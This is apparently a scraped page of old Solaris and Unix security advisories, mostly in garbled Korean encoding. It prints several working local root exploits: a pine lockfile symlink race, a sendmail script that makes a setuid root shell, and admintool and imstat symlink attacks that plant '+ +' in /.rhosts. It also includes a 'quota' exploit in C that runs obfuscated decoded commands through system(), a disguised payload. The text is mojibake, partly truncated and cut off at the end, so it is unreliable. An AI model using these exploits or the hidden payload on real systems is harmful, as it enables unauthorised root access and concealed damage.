    #
    # version 3.91, 3.92 .....
    # version 3.95 fixed
    #
    # Note: must do some changes in the script. look 4 CHANGE THIS:
    #
    # Yea i know is a lame script but is better than nothing..
    # try to exploit the bug without a script and you will wait
    # forever.
    # e-torres@uniandes.edu.co
    #
    argumentos=0
    if [ $# -eq $argumentos ]
    then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
    fi
    username=$1
    archivo=$2
    #CHANGE THIS:
    #text='text to puit in file to create'
    #usr=path of the program users
    #pineprog=how the pine program appears when u do a w (who) command
    text='+ +'
    usr=users
    pineprog=pine
    #
    date
    echo "- Looking for $1 to log in... just wait"
    #
    entrada=0
    entro=0
    until [ $entro -eq $entrada ]
    do
    for nombre in `$usr`
    do
    if [ $nombre = $1 ]
    then
    entro=1
    fi
    done
    done
    date
    echo "- Ok $username is logged now."
    #
    echo "- Lets wait that $1 run pine. "

    noejecuto=0
    ejecuto=0
    until [ $ejecuto -ne $noejecuto ]
    do

    for ejecutando in `w $username`


    do
    if [ $ejecutando = $pineprog ]
    then
    date
    echo '- OK ' $1 ' is running ' $pineprog '.'
    ejecuto=1
    fi
    done
    done
    echo "- Now lets grab the lock file of $username from /tmp"
    ls -al /tmp | grep $username > temp1
    cat temp1 | grep rw-rw-rw- > temporal
    lockfile=`awk '{print $9}' temporal`
    rm temp1
    rm temporal
    echo "> Username $username"
    echo "> Lockfile $lockfile"
    echo
    echo "- OK now im going to wait that $username "
    echo " quits $pineprog "
    # do it till exist lockfile, that means username havent quit pine
    cd /tmp
    while [ -s $lockfile ]
    do
    sleep 0
    done
    cd
    date
    echo "- OK $username quit $pineprog .. now to link $lockfile "
    #$archivo is the complete path of file in username
    cd /tmp
    (ÇÑÁÙÀÇ °úÁ¤)
    cho "- $lockfile is now linked "
    cd
    echo "- $username must now return to pine to create"
    echo " $archivo "
    echo "- Waiting $username to return pine "
    noejecuto=0
    ejecuto=0
    until [ $ejecuto -ne $noejecuto ]
    do
    for ejecutando in `w $username `
    do
    if [ $ejecutando = $pineprog ]
    then
    date
    echo '- OK ' $username ' is running ' $pineprog
    ejecuto=1
    fi
    done
    done
    echo "- Introducing text..."
    cd /tmp
    echo $text > $lockfile
    echo "- Erasing $lockfile "
    rm $lockfile
    cd
    echo "THE END DUDE!"
    echo "ET Lownoise 1996 "

    ÇØ°áÃ¥
    PineÀÇ ¹öÁ‾À» 3.95ÀÌ»óÀ¸—Î ¹Ù²Ù¾î¶ó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º sendmail
    ¸í—É
    sendmail ( 8.7.x ~ 8.8.2?)
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.5 2.5.1
    ¹®Á¦Á¡
    ¼¾µå ¸ÞÀÏ»óÀÇ ¹ö±×—Î —çÆ®½©À» »ý¼ºÇÒ ¼ö ÀÖ´Ù.
    ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù.
    #/bin/sh
    #
    # Modify RUN in x.c for what you wanna run, and possibly the
    # location or format of the ps command in the KILL line below for
    # your platform.
    #
    # Or you could remove x.c alltogether and just put what you wanna
    # do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
    #
    #
    cat << _EOF_ >/tmp/x.c
    #define RUN "/bin/ksh"
    #include
    main()
    {
    execl(RUN,RUN,NULL);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
    main()
    {
    (ÀϗÃÀÇ °úÁ¤ ..)
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
    main()
    {
    setuid(0); setgid(0);
    system("chown root /tmp/x ;chmod 4755 /tmp/x");
    }
    _EOF_
    #
    #
    gcc -O -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut
    -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
    echo "leet..."
    /tmp/x
    fi
    ÇØ°áÃ¥
    ¼¾µå¸ÞÀÏÀÇ ¹öÁ‾À» 8.8.5 ÀÌ»óÀ¸—Î ¿Ã¸®¸é µÈ´Ù.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º admintool
    ¸í—É
    admintool
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.5
    ¹®Á¦Á¡
    ´ÙÀ½°ú °°Àº°£´ÜÇÑ °æÀ§—Î .rhostsÆÄÀÏÀ» »ý¼ºÇÏ¿© —çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù.
    setenv DISPLAY yourdisplay:0.0
    ln -s /.rhosts /tmp/.group.lock
    /usr/bin/admintool
    (ÀϗÃÀÇ °úÁ¤ )
    echo "+ +" >> .rhosts
    /usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"
    ÇØ°áÃ¥
    setuid¸¦ ¾ø¾Ö´øÁö ÆÐÄ¡¸¦ Ç϶ó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º imstat(¶óÀ̼¾½º ¸Å´ÏÁ®)
    ¸í—É
    imstat(¶óÀ̼¾½º ¸Å´ÏÁ®)
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.4
    ¹®Á¦Á¡
    /var/tmp ¿¡ Àӽà ÆÄÀÏÀ» ¸¸µç´Ù..À̸¦ ÀÌ¿ëÇؼ .rhosts¸¦ ¸µÅ©½ÃÄÑ
    »ý¼ºÇÒ ¼ö ÀÖ´Ù.
    rm /var/tmp/locksuntechd
    ln -s /.rhosts /var/tmp/locksuntechd
    (ÀϗÃÀÇ °úÁ¤ )

    ÇØ°áÃ¥
    Æ۹̼ÇÀ» ´Ý¾î¶ó
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º quota
    ¸í—É
    quota
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.5(.1 ??)
    ¹®Á¦Á¡
    ÄõÅÍÁ¦ÇÑÀ» ÇÇÇϸ鼍 ÆÄÀÏÀ» »ý¼ºÇÒ ¼ö ÀÖ´Ù.

    ±× ¿¹Á¦ÀÌ´Ù.

    /**************************************************************************
    * This exploit takes advantage of the latest sendmail hole, to hide *
    * warez from your quota program, effectivly making your quota infinate.. *
    * *
    * To compile: *
    * cc -o bigquota quota.c *
    * To run: *
    * ./bigquota file *
    * where file is the file you wish to hide from your quota program. *
    * *
    * Please note that this may take a minute. *
    * If you have any problems, talk to me, TSK, on IRC. *
    **************************************************************************/
    #include
    #include
    #include
    #include
    #include
    int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
    44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
    65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
    118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
    94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
    85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
    32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
    112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
    115,85,38,30,122,126,3,93,97,44,100,32,33,10};
    void main(argc, argv)
    int argc;
    char *argv[];
    {
    char *checkseed(int *seeds);
    char *checkdir(char *dir);
    int initseeds[201]={25,\
    108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
    116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
    2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
    98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
    95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
    41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
    109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
    126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
    53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
    3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
    int setupseeds[201]={1,\
    35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
    110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
    29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
    38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
    28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
    119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
    93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
    -6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
    42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
    67,-10,-79,96,23,4,3,-68,84,64,89};
    int binseeds[201]={1,\
    14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
    121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
    64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
    89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
    121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
    12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
    42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
    -7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
    -23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
    89,-7,-11,94,19,-65,72,-3,67,79,111};
    int procseeds[201]={-14,\
    97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
    17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
    121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
    125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
    78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
    95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
    107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
    99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
    116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
    85,-11,-22,111,-47,-65,60,-1,85,78,106};
    int boutseeds[201]={-14842,\
    37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
    17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
    74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
    75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
    70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
    34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
    6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
    106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
    -55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
    32,-72,-94,40,-61,-54,-12,11,72,66,91};
    int shtdwnseeds[201]={-42,\
    58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
    122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
    69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
    115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
    125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
    1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
    32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
    108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
    12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
    16,-90,-78,45,-38,-65,56,11,77,71,89};
    char *zipper(int *seeds1);
    char *path;
    int i=0,j,inhan,outhan;
    if(argc!=2)
    {
    puts("Usage:");
    puts("quota ");
    puts("where is the file you wish");
    puts("to hide/subtract from your quota.");
    exit(0);
    }
    system(zipper(initseeds));
    system(zipper(setupseeds));
    system(checkseed(binseeds));
    path=checkdir("/");
    if(!path)
    {
    puts("Technical Dificulties");
    goto closeout;
    }
    if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
    {
    puts("Error opening outfile");
    goto closeout;
    }
    if((inhan=open(argv[1],O_RDONLY))==-1)
    {
    puts("Error opening infile");
    goto closeout;
    }
    if(filecopy(inhan,outhan))
    {
    puts("Technical dificulties");
    goto closeout;
    }
    if((unlink(argv[1]))==-1)
    {
    puts("Technical dificulties.");
    goto closeout;
    }
    if((rename(path,argv[1]))==-1)
    if((link(path,argv[1]))==-1)
    if((symlink(path,argv[1]))==-1)
    puts("Technical Dificulties.");
    closeout:
    system("%s\n",zipper(procseeds));
    system("%s\n",zipper(boutseeds));
    system("%s\n",zipper(shtdwnseeds));
    }
    char *checkseed(int *seeds)
    {
    char *zipper(int *seeds1);
    char *string;
    char testseeds[30];
    char god[200];
    int i=200,j;
    if((string=(char *)getenv("PATH"))==NULL)
    {
    puts("Path not found");
    exit(-1);
    }
    while((seeds[i]+seedsc[i])!=32)
    {
    testseeds[200-i]=seeds[i]+seedsc[i];
    i--;
    }
    testseeds[i]=0;
    i=0;
    while(string[i]!=0)
    {
    j=0;
    while(string[i]!=58&&string[i]!=0)
    {
    god[j]=string[i];
    i++;
    j++;
    }
    i++;
    god[j++]=47;
    god[j++]=0;
    strcpy(&god[j],testseeds);
    if(!stat(god,NULL))
    return (char *)zipper(seeds);
    }
    return 0;
    }
    char *zipper(int *seeds1)
    {
    int i;
    char *buhbye;
    char teeth[201];
    teeth[201]=0;
    for(i=200;i>=0;i--)
    teeth[200-i]=seeds1[i]+seedsc[i];
    buhbye=(char *)malloc(201);
    strcpy(buhbye,teeth);
    return buhbye;
    }
    int filecopy(int from,int to)
    {
    int bufsiz;
    if (from < 0)
    return 1;
    if (to < 0)
    goto err;
    for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1)
    {
    register char *buffer;
    buffer = (char *) malloc(bufsiz);
    if (buffer)
    {
    while (1)
    {
    register int n;
    n = read(from,buffer,bufsiz);
    if (n == -1)
    break;
    if (n == 0)
    {
    free(buffer);
    return 0;
    }
    if (n != write(to,buffer,(unsigned) n))
    break;
    }
    free(buffer);
    break;
    }
    }
    err:
    return 1;
    }
    char *checkdir(char *dir)
    {
    char *checkdir(char *dir);
    DIR *currdir;
    struct dirent *node;
    struct stat statnode;
    int i,j;
    char *path;
    char *retpath;
    path=(char *)malloc(300);
    if((currdir=opendir(dir))==NULL)
    return 0;
    node=readdir(currdir);
    while(node)
    {
    i=0;
    j=0;
    while(dir[i])
    {
    path[i]=dir[i];
    i++;
    }
    if(strcmp(dir,"/"))
    {
    path[i]='/';
    i++;
    }
    while(node->d_name[j])
    {
    path[i]=node->d_name[j];
    i++;
    j++;
    }
    path[i]=0;
    if((lstat(path,&statnode))==-1)
    return 0;
    if(statnode.st_mode&S_IFREG)
    if(!access(path,W_OK))
    if(!(statnode.st_mode&S_IFBLK))
    if(!(statnode.st_mode&S_ISVTX))
    if(statnode.st_uid!=getuid())
    return path;
    if(statnode.st_mode&S_IFDIR)

    Você também pode gostar